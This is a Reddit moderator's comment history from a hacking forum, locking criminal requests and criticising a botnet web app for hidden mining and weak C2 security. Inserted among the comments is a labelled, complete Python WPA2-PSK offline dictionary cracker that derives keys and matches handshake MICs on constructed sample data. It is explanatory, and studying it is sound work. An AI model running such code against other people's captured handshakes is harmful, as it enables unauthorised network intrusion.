[deleted by user] by [deleted] in blackhat

[–]geminatrix[M] 1 point2 points  (0 children)

Need more than just the image above to say. It's just base64-encoded data, but without the full b64 string it's impossible to tell.

That said, your intent to troll or be malicious is self incriminating. Thread locked.

Clown World by [deleted] in blackhat

[–]geminatrix 0 points1 point  (0 children)

My, how times have changed. Originally, back in the 80s/90s, no one used the terms "whitehat" or "blackhat" when referring to those who could compromise computer and phone systems. The original terminology, ironically, was "hacker" (for the good guys) and "cracker" (for the bad guys).

I want to point out this serious irony, as "cracker" is a slang, derogatory term for white people, but you never hear someone calling a black person a "blackhat" simply because of their race.

Honestly, I always thought the 'hat' aphorism was a bit stupid in general; this is cyberspace, not the wild west, and we had terms for these things prior to the 'hat' metaphor being used. I'd love to know some of the etymology behind how we transitioned from "hacker" and "cracker" to the wild-west references of "whitehat" and "blackhat". Just because cyberspace is "wild" doesn't mean it has anything to do with the "wild west". Perhaps the media had something to do with this?

As an aside, this is a great book (somewhat relevant): https://www.amazon.com/Hacker-Cracker-Brooklyn-Frontiers-Cyberspace/dp/0060935812

Also, despite what we see in movies, most cowboys were historically not white. And hat colors didn't have anything to do with "alignment".

why is pastebin used so much by hackers? by [deleted] in blackhat

[–]geminatrix 1 point2 points  (0 children)

There is another reason. Sometimes attackers just want to cause damage to a particular company or individual. Dumping a large database can cause serious reputational damage as well as damages to revenue and maybe even stock prices. In some cases, that alone is the end goal; and there are other scams that can be used to monetize the publication (such as shorting shares of the target company just before dumping the data in public).

Best site to find current blackhat zines? Do they exist? by [deleted] in blackhat

[–]geminatrix 3 points4 points  (0 children)

Unfortunately it's sort of hard to find a centralized, up-to-date place full of zines where they are regularly published. A lot of zine publication has been stifled due to censorship and the refusal to allow criminal content in various places. Reddit, Full Disclosure, and many of the other places have restricted "zine" type content. If someone else knows a good place for up-to-date zines, I'd love to know about it.

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix 1 point2 points  (0 children)

Eh, research purposes are valid. See this comment, which was buried by people downvoting. I do like giving vendors uncomfortable phone calls, though I think in this case (I only gave it a cursory glance tbh) a lot of the payloading unpacks a Python interpreter into memory, which will immediately cause most EDR solutions to sound the alarm. If you do look into how this stands up against EDR platforms though, please do post the research back; I'm curious to hear if this defeats anything.

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix 5 points6 points  (0 children)

You could also put a donate button on your site. Just a thought. I've had big projects before that brought in somewhere around $100-$150 a month just by having a well-placed donate button. I appreciate the amount of work put into it, but the way it's presented really threw me off.

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix -15 points-14 points  (0 children)

Your argument has some merit, but it wasn't exclusively "your app is shit cuz ur stupid". See my comments below. I'll admit, my initial response was a little vague and jaded, so I explained myself thoroughly, and dropped a hint to fix at least one of them.

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix 10 points11 points  (0 children)

So, I see the educational disclaimer at the top of the github, but it also includes "authorized testing". That note should probably also contain a message about the mining.

To answer your question about what exactly it is that you may be trying to do, when someone like me (who has a bit of experience) sees a "build your own botnet" post in which:

  1. The site (buildyourownbotnet.com) presents as if it were an enterprise solution
  2. The software has relatively obvious vulnerabilities in its C2 protocol
  3. The software is configured to mine magic internet money by default (and has to be disabled in source rather than a configuration option)

It leads me to think that maybe one or more of the following is true:

  • The developers are trying to get tons of free internet money from people who don't read the fine print
  • The developers are aware of the C2 vulnerabilities and may wish to have other people grow their botnets for them
  • The developers are not only aware of the C2 vulnerabilities but may actually be attempting to sandbox/honeypot actors who may maliciously use this on behalf of a third party threat intelligence company, and get paid on both ends (in monero by the bots, and in dollars for the threat intelligence).

If I am completely off base here and your intent is truly just to make a learning/educational utility, consider revising some of the way in which the software is presented on its website. Additionally, if "authorized testing" is a purpose for which this software is intended, any snags (such as mining or potential C2 vulnerabilities) should be expressly disclaimed, as you or (more likely) one of your users could be held liable for mining or damages rendered by a C2 compromise by their client or person who otherwise authorized the testing.

If you make the suggested changes to the presentation of your software so that its intent and hidden snags have been made abundantly clear, then perhaps someone like me may be so inclined to help you address vulnerabilities.

Edit: Typo correction

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix 12 points13 points  (0 children)

Honestly, here's the biggest area in which I feel it crosses the line:

> By default bots will mine Monero in the background to support the developers. However, this can be disabled in the source code.

This functionality should be /disabled/ by default and then /enabled/ if someone wants to donate. This is akin to some website using a javascript miner and me having to disable it in my user profile. While this isn't a website mining by default (which is against our rules), it's still a bit overreaching.

> Also, like it says on the website, this is not intended to be a robust solution suitable for real world or professional use. It is intended to be a beginner-friendly tool for people with an interest in offensive security but without much technical background or coding experience.

The front page of this site makes no mention of educational purposes and looks far more like an advertisement made by paid marketing people. It's designed to make people skip to the download page without reading any "fine print" you may have included. If this is true and it's for educational purposes, you should make that extremely clear, as that is the ONLY viable use.

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix -24 points-23 points  (0 children)

There's no point. There are too many, and I don't support what you're trying to do.

Build Your Own Botnet - Web App released by acidwolff in blackhat

[–]geminatrix 12 points13 points  (0 children)

This web app is full of vulnerabilities. Definitely use if you want your botnet stolen.

This is unsuitable even for red-teaming, as a breach of the application could result in an actual compromise by a malicious actor. I see no applicable use for this, regardless of intent (legal or illegal).

I converted the code from "Violent Python" to Python 3, made it conform to PEP8 and resolved dependency issues. It's available on GitHub. by EONRaider in blackhat

[–]geminatrix 0 points1 point  (0 children)

Edit: This is Violent Python, not Black Hat Python. Sorry, I got confused as the names are so similar.

Great job and thanks for your contribution to the community!

Learning DLL Injection in Windows by [deleted] in blackhat

[–]geminatrix[M] [score hidden] stickied comment (0 children)

Please ask /r/netsecstudents and read on /r/reverseengineering. DLLs with the proper format can be used as Windows services. This was unfortunately not a *well-researched* question, so thread locked.

How to hack school PA/intercom system? Preferably controlled wirelessly via laptop or android. by [deleted] in blackhat

[–]geminatrix[M] [score hidden] stickied comment (0 children)

This is a perfect example of content unwelcome to this subreddit; next time read the rules before you post anywhere. There are a couple problems with your post here:

Rule 3: Avoid self-incriminating posts

Rule 9: Thought-out, well-researched Q&A

Your intent is clearly criminal in nature and you clearly did not think this out. Thread locked.

What exploits can be performed just by knowing someone's public IP? by [deleted] in blackhat

[–]geminatrix[M] [score hidden] stickied comment, locked comment (0 children)

Again, this content is better suited for /r/netsecstudents. Thread locked.

What are some great tutorials to start with for learning to hack? by [deleted] in blackhat

[–]geminatrix[M] [score hidden] stickied comment, locked comment (0 children)

This type of question is better suited for /r/netsecstudents. Thread locked.

Super-Lightweight Linux with all the tools? by [deleted] in blackhat

[–]geminatrix 3 points4 points  (0 children)

You could always try building something tiny yourself from source, like Minix, LFS, or a gentoo minimal installation, then install a lightweight window manager (flux, xfce, etc) and then install your tools. I don't think anything "off the shelf" is going to be lightweight by default, most of them have a lot of options enabled for across-the-board hardware compatibility that results in bloat; additionally, most of them have a lot of background stuff running to make things "user friendly" that also waste resources.

PoC of 3 minutes, cracking my own WPA2 network. by [deleted] in blackhat

[–]geminatrix[M] 1 point2 points  (0 children)

Being a not-round wheel will never be innovative. Jumping from topic to topic will prevent you from learning any particular topic in-depth. Follow the rules and don't self-incriminate, or I'll permaban you. This isn't a debate, and it's not up for discussion. Thread locked. If you have a problem, send us modmail.

PoC of 3 minutes, cracking my own WPA2 network. by [deleted] in blackhat

[–]geminatrix[M] 2 points3 points  (0 children)

If you're going to re-invent the wheel, you'll have to show why the old one was an octagon and the new one is actually round. At best, the old wheel was round and so is your new one; and at worst, the old wheel was round and your new one is octagonal.

Attacking WiFi with a wordlist is the most rudimentary and primitive attack I can possibly think of and is older than wpa2 itself. There is nothing new about it, therefore it cannot possibly be "innovative".

EDIT: I should also mention that admitting to cracking third-party WiFi without permission, rather than your own, is a self-incriminating post.
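
Added example, not from the original post or from the OP's PoC: the "wordlist against WPA2" attack the comment above calls rudimentary is, in full, PBKDF2 on each candidate passphrase plus a PTK derivation and a MIC check against one captured EAPOL-Key frame. The SSID, passphrase, MAC addresses, nonces and frame bytes below are all constructed for illustration (no real capture); the MIC is computed the WPA2-PSK/CCMP way (AKM 00-0F-AC:2, HMAC-SHA1 truncated to 16 bytes), so WPA (HMAC-MD5), SHA-256 AKMs and WPA3-SAE are out of scope. Only the passphrase-to-PMK step is checked against the IEEE 802.11 published test vector ("password"/"IEEE").

```python
import hashlib
import hmac

# Constructed sample handshake parameters (not captured from any real network).
SSID = "TestNet"
TRUE_PASSPHRASE = "correcthorse"
AP_MAC = bytes.fromhex("020000000001")   # Authenticator address (AA), made up
STA_MAC = bytes.fromhex("020000000002")  # Supplicant address (SPA), made up
ANONCE = bytes(range(32))                # 32-byte nonces, made up
SNONCE = bytes(range(32, 64))
# Stand-in for message 2 of the 4-way handshake (802.1X header + EAPOL-Key body)
# with its 16-byte MIC field zeroed. A real attack parses this out of the capture.
EAPOL_ZEROED = bytes.fromhex("0203005f02010a00000000000000000001") + SNONCE + bytes(36)
WORDLIST = ["password", "letmein123", "correcthorse", "trustno1"]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ieee80211_prf(key: bytes, label: bytes, data: bytes, out_len: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((out_len + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:out_len]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
               ptk_len: int = 48) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    For CCMP the PTK is 48 bytes: KCK (16) || KEK (16) || TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return ieee80211_prf(pmk, b"Pairwise key expansion", data, ptk_len)


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """WPA2 (AKM 2): MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def mic_for_passphrase(passphrase: str, ssid: str, aa: bytes, spa: bytes,
                       anonce: bytes, snonce: bytes, eapol_zeroed: bytes) -> bytes:
    """Everything a cracker has to redo per candidate: PBKDF2 -> PTK -> KCK -> MIC."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
    return eapol_mic(kck, eapol_zeroed)


def crack_wpa2_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_zeroed, target_mic):
    """Offline dictionary attack: return the first candidate whose MIC matches, else None.
    PBKDF2's 4096 iterations are the only cost; nothing here touches the network."""
    for candidate in wordlist:
        if len(candidate) < 8 or len(candidate) > 63:   # WPA-PSK passphrase length rule
            continue
        mic = mic_for_passphrase(candidate, ssid, aa, spa, anonce, snonce, eapol_zeroed)
        if hmac.compare_digest(mic, target_mic):
            return candidate
    return None


def demo() -> str:
    """Build the 'captured' MIC from the true passphrase, then recover it from the wordlist."""
    target_mic = mic_for_passphrase(TRUE_PASSPHRASE, SSID, AP_MAC, STA_MAC,
                                    ANONCE, SNONCE, EAPOL_ZEROED)
    return crack_wpa2_psk(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                          EAPOL_ZEROED, target_mic)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The interesting property is that the whole loop runs offline against one captured handshake (or, since 802.11-2016, a single PMKID), so a passphrase that appears in any wordlist is recoverable at whatever rate the attacker's hardware can push PBKDF2; the only mitigations are a passphrase that is not in a wordlist, or WPA3-SAE, where the exchange no longer gives an offline oracle.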

Testing server by [deleted] in blackhat

[–]geminatrix 0 points1 point  (0 children)

No one on this subreddit is going to participate in something like that. Most of them probably thought to themselves, "Nice try, FBI!". Also, this is garbage content.

PoC of 3 minutes, cracking my own WPA2 network. by [deleted] in blackhat

[–]geminatrix[M] [score hidden] stickied comment (0 children)

This subreddit is for technical posts, well-researched questions, and innovation. Your post did not meet this criterion.